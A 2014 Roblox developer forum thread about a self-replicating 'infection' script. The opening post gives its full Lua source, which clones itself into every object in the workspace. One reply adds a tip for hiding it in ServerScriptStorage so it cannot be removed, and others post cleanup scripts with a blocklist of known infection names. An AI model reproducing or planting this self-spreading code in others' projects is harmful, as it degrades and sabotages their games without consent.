|
| 03 May 2014 12:43 PM |
if script.Parent.className ~= "RotateP" then local p = Instance.new("RotateP") p.Parent = workspace p.Name = "INfecTION" script.Parent = p end
function check() local list = workspace:GetChildren() for i = 1, #list do if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then script.Parent:Clone().Parent = list[i] end wait() end end
while true do check() if workspace:findFirstChild("inFECtion") == nil then local main = script.Parent:Clone() main.Name = "inFECtion" main.Parent = workspace end wait(3) end
|
|
|
| Report Abuse |
|
|
ninja5566
|
  |
| Joined: 14 Jan 2009 |
| Total Posts: 5233 |
|
|
| 03 May 2014 12:45 PM |
| spams the hell out of the workspace with a weld called "Infection" aka a classic virus script. |
|
|
| Report Abuse |
|
|
transIate
|
  |
| Joined: 20 Jun 2013 |
| Total Posts: 2699 |
|
|
| 03 May 2014 12:46 PM |
LOL.
noobs using free models |
|
|
| Report Abuse |
|
|
|
| 03 May 2014 12:46 PM |
| I played my game and it plays normally. Should i spend 999 years deleting it or just leave it |
|
|
| Report Abuse |
|
|
ninja5566
|
  |
| Joined: 14 Jan 2009 |
| Total Posts: 5233 |
|
|
| 03 May 2014 12:50 PM |
It's impossible to rid your self of this virus,
it always comes back when you delete it. |
|
|
| Report Abuse |
|
|
|
| 03 May 2014 12:51 PM |
but it doesnt do anything so does it really matter |
|
|
| Report Abuse |
|
|
ninja5566
|
  |
| Joined: 14 Jan 2009 |
| Total Posts: 5233 |
|
|
| 03 May 2014 12:53 PM |
| Eventually, it could cause lag. |
|
|
| Report Abuse |
|
|
|
| 03 May 2014 12:54 PM |
Wtf any account i use has it now seriously |
|
|
| Report Abuse |
|
|
|
| 03 May 2014 12:55 PM |
| I cant build on any account |
|
|
| Report Abuse |
|
|
frost209
|
  |
| Joined: 31 Aug 2008 |
| Total Posts: 90 |
|
| |
|
Hans3229
|
  |
| Joined: 05 Feb 2010 |
| Total Posts: 109 |
|
|
| 03 May 2014 01:49 PM |
| What you have to do is pause the game and then delete them all. |
|
|
| Report Abuse |
|
|
ninja5566
|
  |
| Joined: 14 Jan 2009 |
| Total Posts: 5233 |
|
|
| 03 May 2014 02:09 PM |
@Hans
Ninja566 uses counter-attack!
script.Parent=ServerScriptStorage
it's super effective, and thus making the script un-removable. |
|
|
| Report Abuse |
|
|
|
| 03 May 2014 04:14 PM |
| so how do you remove it from script storage |
|
|
| Report Abuse |
|
|
|
| 03 May 2014 04:17 PM |
| Try using this script. It worked amazingly well for me. |
|
|
| Report Abuse |
|
|
|
| 03 May 2014 04:18 PM |
| http://www.roblox.com/Infection-Cleaner-item?id=20026991 |
|
|
| Report Abuse |
|
|
ninja5566
|
  |
| Joined: 14 Jan 2009 |
| Total Posts: 5233 |
|
|
| 03 May 2014 05:06 PM |
you can only fight against it by removing it every single time with an auto-script,
however it's entirely impossible to remove fully. |
|
|
| Report Abuse |
|
|
Bapse
|
  |
| Joined: 25 Apr 2014 |
| Total Posts: 13 |
|
|
| 03 May 2014 05:14 PM |
try deleting the model from your inventory and also delete your local roblox files C:\Users\(YOUR USERNAME)\AppData\Local\Roblox |
|
|
| Report Abuse |
|
|
|
| 03 May 2014 05:16 PM |
while game:findFirstChild('inFECtion', true) ~= nil do -- change infection to whatever its called wait(0) game:findFirstChild('inFECtion', true):Destroy() end
ta daa
#nerdsunited |
|
|
| Report Abuse |
|
|
|
| 18 May 2014 06:22 PM |
i just used this script
-- start of script -- Names of Infections
Infections = { "Fire", "Anti-Lag", "Anti-Virus", "Antivirus", "SnapRemover", "Script or is it...", "Script Or Is It..", "script or is it...", "Script......Or is it...", "Infection", "INFectION", "infECTion", "INfecTION", "inFECtion", "Virus", "virus", "umad", "Umad", "dåååååååååååååång.........you got owned...", "4D Being" } -- dont edit below here repeat Found = false for _,v in ipairs(Infections) do Inf = game:FindFirstChild(v, true) if Inf then Found = true Inf:Destroy() end end until Found == false
-- end of script made by RevolutionXPK |
|
|
| Report Abuse |
|
|